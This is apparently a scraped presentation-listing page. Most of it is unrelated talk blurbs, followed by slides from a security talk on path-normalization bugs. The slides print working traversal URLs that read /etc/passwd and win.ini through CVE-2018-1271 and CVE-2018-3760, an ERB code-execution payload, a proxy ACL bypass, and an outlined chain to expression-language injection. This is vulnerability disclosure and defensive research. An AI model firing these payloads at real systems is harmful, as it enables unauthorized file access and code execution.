Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
Cloud Security Groups are the firewalls of the cloud. They are built-in and provide basic access control functionality as part of the shared responsibility model. However, Cloud Security Groups do not provide the same protection or functionality that enterprises have come to expect with on-premises deployments. In this talk we will discuss the top cloud risks in 2020, why perimeters are a concept of the past and how in the world of no perimitiers do Cloud Security groups, the "Cloud FIrewalls", fit it. We will practically explore Cloud Security Group limitations across different cloud setups from a single vNet to multi-cloud
Most organizations have good enterprise-level security policies that define their approach to maintaining, improving, and securing their information and information systems. However, once the policies are signed by senior leadership and distributed throughout the organization, significant cybersecurity governance challenges remain. In this workshop I will explain the transforming organizational security to strengthen defenses and integrate cybersecurity with the overall approach toward security governance, risk management and compliance.
The Internet is home to seemingly infinite amounts of confidential and personal information. As a result of this mass storage of information, the system needs to be constantly updated and enforced to prevent hackers from retrieving such valuable and sensitive data. This increasing number of cyber-attacks has led to an increasing importance of Ethical Hacking. So Ethical hackers' job is to scan vulnerabilities and to find potential threats on a computer or networks. An ethical hacker finds the weakness or loopholes in a computer, web applications or network and reports them to the organization. It requires a thorough knowledge of Networks, web servers, computer viruses, SQL (Structured Query Language), cryptography, penetration testing, Attacks etc. In this session, you will learn all about ethical hacking. You will understand the what ethical hacking, Cyber- attacks, Tools and some hands-on demos. This session will also guide you with the various ethical hacking certifications available today.
Fueling AI with Great Data with Airbyte WebinarZilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
Digital Banking in the Cloud: How Citizens Bank Unlocked Their MainframePrecisely
Inconsistent user experience and siloed data, high costs, and changing customer expectations – Citizens Bank was experiencing these challenges while it was attempting to deliver a superior digital banking experience for its clients. Its core banking applications run on the mainframe and Citizens was using legacy utilities to get the critical mainframe data to feed customer-facing channels, like call centers, web, and mobile. Ultimately, this led to higher operating costs (MIPS), delayed response times, and longer time to market.
Ever-changing customer expectations demand more modern digital experiences, and the bank needed to find a solution that could provide real-time data to its customer channels with low latency and operating costs. Join this session to learn how Citizens is leveraging Precisely to replicate mainframe data to its customer channels and deliver on their “modern digital bank” experiences.
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyScyllaDB
Freshworks creates AI-boosted business software that helps employees work more efficiently and effectively. Managing data across multiple RDBMS and NoSQL databases was already a challenge at their current scale. To prepare for 10X growth, they knew it was time to rethink their database strategy. Learn how they architected a solution that would simplify scaling while keeping costs under control.
Monitoring and Managing Anomaly Detection on OpenShift.pdfTosin Akinosho
Monitoring and Managing Anomaly Detection on OpenShift
Overview
Dive into the world of anomaly detection on edge devices with our comprehensive hands-on tutorial. This SlideShare presentation will guide you through the entire process, from data collection and model training to edge deployment and real-time monitoring. Perfect for those looking to implement robust anomaly detection systems on resource-constrained IoT/edge devices.
Key Topics Covered
1. Introduction to Anomaly Detection
- Understand the fundamentals of anomaly detection and its importance in identifying unusual behavior or failures in systems.
2. Understanding Edge (IoT)
- Learn about edge computing and IoT, and how they enable real-time data processing and decision-making at the source.
3. What is ArgoCD?
- Discover ArgoCD, a declarative, GitOps continuous delivery tool for Kubernetes, and its role in deploying applications on edge devices.
4. Deployment Using ArgoCD for Edge Devices
- Step-by-step guide on deploying anomaly detection models on edge devices using ArgoCD.
5. Introduction to Apache Kafka and S3
- Explore Apache Kafka for real-time data streaming and Amazon S3 for scalable storage solutions.
6. Viewing Kafka Messages in the Data Lake
- Learn how to view and analyze Kafka messages stored in a data lake for better insights.
7. What is Prometheus?
- Get to know Prometheus, an open-source monitoring and alerting toolkit, and its application in monitoring edge devices.
8. Monitoring Application Metrics with Prometheus
- Detailed instructions on setting up Prometheus to monitor the performance and health of your anomaly detection system.
9. What is Camel K?
- Introduction to Camel K, a lightweight integration framework built on Apache Camel, designed for Kubernetes.
10. Configuring Camel K Integrations for Data Pipelines
- Learn how to configure Camel K for seamless data pipeline integrations in your anomaly detection workflow.
11. What is a Jupyter Notebook?
- Overview of Jupyter Notebooks, an open-source web application for creating and sharing documents with live code, equations, visualizations, and narrative text.
12. Jupyter Notebooks with Code Examples
- Hands-on examples and code snippets in Jupyter Notebooks to help you implement and test anomaly detection models.
AppSec PNW: Android and iOS Application Security with MobSFAjin Abraham
Mobile Security Framework - MobSF is a free and open source automated mobile application security testing environment designed to help security engineers, researchers, developers, and penetration testers to identify security vulnerabilities, malicious behaviours and privacy concerns in mobile applications using static and dynamic analysis. It supports all the popular mobile application binaries and source code formats built for Android and iOS devices. In addition to automated security assessment, it also offers an interactive testing environment to build and execute scenario based test/fuzz cases against the application.
This talk covers:
Using MobSF for static analysis of mobile applications.
Interactive dynamic security assessment of Android and iOS applications.
Solving Mobile app CTF challenges.
Reverse engineering and runtime analysis of Mobile malware.
How to shift left and integrate MobSF/mobsfscan SAST and DAST in your build pipeline.
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor IvaniukFwdays
At this talk we will discuss DDoS protection tools and best practices, discuss network architectures and what AWS has to offer. Also, we will look into one of the largest DDoS attacks on Ukrainian infrastructure that happened in February 2022. We'll see, what techniques helped to keep the web resources available for Ukrainians and how AWS improved DDoS protection for all customers based on Ukraine experience
Conversational agents, or chatbots, are increasingly used to access all sorts of services using natural language. While open-domain chatbots - like ChatGPT - can converse on any topic, task-oriented chatbots - the focus of this paper - are designed for specific tasks, like booking a flight, obtaining customer support, or setting an appointment. Like any other software, task-oriented chatbots need to be properly tested, usually by defining and executing test scenarios (i.e., sequences of user-chatbot interactions). However, there is currently a lack of methods to quantify the completeness and strength of such test scenarios, which can lead to low-quality tests, and hence to buggy chatbots.
To fill this gap, we propose adapting mutation testing (MuT) for task-oriented chatbots. To this end, we introduce a set of mutation operators that emulate faults in chatbot designs, an architecture that enables MuT on chatbots built using heterogeneous technologies, and a practical realisation as an Eclipse plugin. Moreover, we evaluate the applicability, effectiveness and efficiency of our approach on open-source chatbots, with promising results.
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving
Manufacturing custom quality metal nameplates and badges involves several standard operations. Processes include sheet prep, lithography, screening, coating, punch press and inspection. All decoration is completed in the flat sheet with adhesive and tooling operations following. The possibilities for creating unique durable nameplates are endless. How will you create your brand identity? We can help!
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
Introduction of Cybersecurity with OSS at Code Europe 2024Hiroshi SHIBATA
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
The Microsoft 365 Migration Tutorial For Beginner.pptxoperationspcvita
This presentation will help you understand the power of Microsoft 365. However, we have mentioned every productivity app included in Office 365. Additionally, we have suggested the migration situation related to Office 365 and how we can help you.
You can also read: https://www.systoolsgroup.com/updates/office-365-tenant-to-tenant-migration-step-by-step-complete-guide/
Taking AI to the Next Level in Manufacturing.pdfssuserfac0301
Read Taking AI to the Next Level in Manufacturing to gain insights on AI adoption in the manufacturing industry, such as:
1. How quickly AI is being implemented in manufacturing.
2. Which barriers stand in the way of AI adoption.
3. How data quality and governance form the backbone of AI.
4. Organizational processes and structures that may inhibit effective AI adoption.
6. Ideas and approaches to help build your organization's AI strategy.
7. Why path normalization
• Most web handle files(and apply lots of security mechanism)
• Lack of overall security review
• Code change too fast, does the patch and protection still work?
• The 3 years Mojarra story - from CVE-2013-3827 to CVE-2018-1234
15. Nginx off-by-slash fail
• First shown in 2016 December HCTF - credit to @iaklis
• A good attack vector but very few people know
• Nginx says this is not their problem
• Nginx alias directive
• Defines a replacement for the specified location
18. How to find in real world
• Discovered in a private bug bounty program and got the
maximum bounty from that program!
200 http://target/static/app.js
403 http://target/static/
404 http://target/static/../settings.py
403 http://target/static../
200 http://target/static../static/app.js
200 http://target/static../settings.py
21. Polyglot URL path
• Applications relied on getPath() in Windows
• Normalized result from getFile() or toExternalForm() in Linux
URL base = new URL("file:///C:/Windows/temp/");
URL url = new URL(base, "file?/../../win.ini");
URL base = new URL("file:///tmp/");
URL url = new URL(base, "../etc/passwd?/../../tmp/file");
22. 0days I found
CVE
Ruby on Rails CVE-2018-3760
Sinatra CVE-2018-7212
Spring Framework CVE-2018-1271
Spark Framework CVE-2018-9159
Jenkins Pending
Mojarra Pending
Next.js CVE-2018-6184
resolve-path CVE-2018-3732
Aiohttp None
Lighttpd Pending
23. Agenda
1. Introduce the difficulty
2. In-depthly review existing implementations
• Discovered Spring Framework CVE-2018-1271
• Discovered Ruby on Rails CVE-2018-3760
3. New multi-layered architectures attack surface
24. Spring 0day - CVE-2018-1271
• Directory Traversal with Spring MVC on Windows
• The patch of CVE-2014-3625
1. isInvalidPath(path)
2. isInvalidPath(URLDecoder.decode(path, "UTF-8"))
3. isResourceUnderLocation(resource, location)
29. Spring 0day - CVE-2018-1271
• How to exploit?
$ git clone git@github.com:spring-projects/spring-amqp-samples.git
$ cd spring-amqp-samples/stocks
$ mvn jetty:run
http://127.0.0.1:8080/spring-rabbit-stock/static/%255c%255c%255c%255c%255c
%255c..%255c..%255c..%255c..%255c..%255c..%255c /Windows/win.ini
30. Spring 0day - CVE-2018-1271
• Code infectivity? Spark framework CVE-2018-9159
• A micro framework for web application in Kotlin and Java 8
commit 27018872d83fe425c89b417b09e7f7fd2d2a9c8c
Author: Per Wendel <per.i.wendel@gmail.com>
Date: Sun May 18 12:04:11 2014 +0200
+ public static String cleanPath(String path) {
+ if (path == null) {
+ ...
31. Rails 0day - CVE-2018-3760
• Path traversal on @rails/sprockets
• Sprockets is the asset pipeline system in Rails
• Affected Rails under development environment
• Or production mode with assets.compile flag on
33. Rails 0day - CVE-2018-3760
1. Sprockets supports file:// scheme that bypassed absolute_path?
2. URL decode bypassed double slashes normalization
3. Method split_file_uri resolved URI and unescape again
• Lead to double encoding and bypass forbidden_request? and prefix check
http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images
/%252e%252e/%252e%252e/%252e%252e/etc/passwd
34. For the RCE lover
• This vulnerability is possible to RCE
• Inject query string %3F to File URL
• Render as ERB template if the extension is .erb
http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images/%252e%252e
/%252e%252e/%252e%252e/tmp/evil.erb%3ftype=text/plain
<%=`id`%>
/tmp/evil.erb
38. Agenda
1. Introduce the difficulty
2. In-depthly review existing implementations
3. New multi-layered architecture attack surface
• Remote Code Execution on Bynder
• Remote Code Execution on Amazon
P.S. Thanks Amazon and Bynder for the quick response time and open-minded vulnerability disclosure
39. URL path parameter
• d
• Some researchers already mentioned this may lead issues but it still
depended on programming fails
• How to teach an old dog new tricks?
http://example.com/foo;name=orange/bar/
44. How this vuln could be?
• Bypass whitelist and blacklist ACL
• Escape from context mapping
• Management interface
• Web container console and monitor
• Web contexts on the same server
45. Am I affected by this vuln?
• This is an architecture problem and vulnerable by default
if you are using reverse proxy and Java as backend service
• Apache mod_jk
• Apache mod_proxy
• Nginx ProxyPass
• …
47. /..;/ seems like a directory,
pass to you
Shit! /..;/ is
parent directory
http://example.com/portal/..;/manager/html
48. Uber bounty case
• Uber disallow directly access *.uberinternal.com
• Redirect to OneLogin SSO by Nginx
• A whitelist for monitor purpose?
https://jira.uberinternal.com/status
51. Amazon RCE case study
• Remote Code Execution on Amazon Collaborate System
• Found the site collaborate-corp.amazon.com
• Running an open source project Nuxeo
• Chained several bugs and features to RCE
52. Path normalization bug leads to
ACL bypass
How ACL fetch current request page?
protected static String getRequestedPage(HttpServletRequest httpRequest) {
String requestURI = httpRequest.getRequestURI();
String context = httpRequest.getContextPath() + '/';
String requestedPage = requestURI.substring(context.length());
int i = requestedPage.indexOf(';');
return i == -1 ? requestedPage : requestedPage.substring(0, i);
}
53. Path normalization bug leads to
ACL bypass
The path processing in ACL control is inconsistent with servlet
container so that we can bypass whitelists
URL ACL control Tomcat
/login;foo /login /login
/login;foo/bar;quz /login /login/bar
/login;/..;/admin /login /login/../admin
54. Code reuse bug leads to
Expression Language injection
• Most pages return NullPointerException :(
• Nuxeo maps *.xhtml to Seam Framework
• We found Seam exposed numerous Hacker-Friendly features
by reading source code
55. Seam Feature
aaa
If there is a foo.xhtml under servlet context you can
execute the partial EL by actionMethod
http://127.0.0.1/home.xhtml?actionMethod:/foo.xhtml:
utils.escape(...)
"#{util.escape(...)}"
foo.xhtml
56. To make thing worse, Seam will evaluate again if the previous
EL return string like an EL
http://127.0.0.1/home.xhtml?actionMethod:/foo.xhtml:
utils.escape(...)
return
"#{util.escape(...)}"
foo.xhtml
evaluate
#{malicious}
type(string)
57. Code reuse bug leads to
Expression Language injection
We can execute partial EL in any file under servlet context but
need to find a good gadget to control the return value
<nxu:set var="directoryNameForPopup"
value="#{request.getParameter('directoryNameForPopup')}"
cache="true">
widgets/suggest_add_new_directory_entry_iframe.xhtml
58. Code reuse bug leads to
Expression Language injection
We can execute partial EL in any file under servlet context but
need to find a good gadget to control the return value
<nxu:set var="directoryNameForPopup"
value="#{request.getParameter('directoryNameForPopup')}"
cache="true">
widgets/suggest_add_new_directory_entry_iframe.xhtml
60. Chain all together
1. Path normalization bug leads to ACL bypass
2. Bypass whitelist to access unauthorized Seam servlet
3. Use Seam feature actionMethod to invoke gadgets in files
4. Prepare second stage payload in directoryNameForPopup
5. Bypass EL blacklist and use Java reflection API to run shell command
69. Summary
1. Implicit properties and edge cases on path parsers
2. New attack surface on multi-layered architectures
3. Case studies in new CVEs and bug bounty programs
70. Mitigation
• Isolate the backend application
• Remove the management console
• Remote other servlet contexts
• Check behaviors between proxy and backend servers
• Just a Proof-of-Concept to disable URL path parameter on both
Tomcat and Jetty
71. References
• Java Servlets and URI Parameters
By @cdivilly
• 2 path traversal defects in Oracle's JSF2 implementation
By Synopsys Editorial Team
• CVE-2010-1871: JBoss Seam Framework remote code execution
By @meder